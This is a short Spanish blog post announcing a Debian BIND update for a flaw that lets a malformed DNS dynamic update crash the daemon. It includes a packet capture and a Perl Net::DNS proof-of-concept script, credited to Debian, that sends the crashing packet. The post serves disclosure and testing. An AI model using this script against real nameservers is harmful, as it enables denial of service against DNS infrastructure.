Se ha publicado una actualización del paquete BIND para Debian .
Exite un fallo de seguridad con el cual el denomio de dns cae con un paquete especificamente mal formado
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Bind solo fallará si se usa un nameserver como fqdn.
Script que proporcionan en debian para probar el fallo :
#!/usr/bin/perl -w use Net::DNS; our $NSI = '<dns server>'; our $NSI_KEY_NAME = '<key name>'; our $NSI_KEY = '<key>'; my $rzone = '<zone>'; my $rptr = "1.$rzone"; my $packet = Net::DNS::Update->new($rzone); $packet->push( pre => Net::DNS::RR->new( Name => $rptr, Class => 'IN', Type => 'ANY', TTL => 0, ) ); $packet->push( update => Net::DNS::RR->new( Name => $rptr, Class => 'ANY', Type => 'ANY', ) ); $packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY; print $packet->string; Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
Más información aquí
Deja una respuesta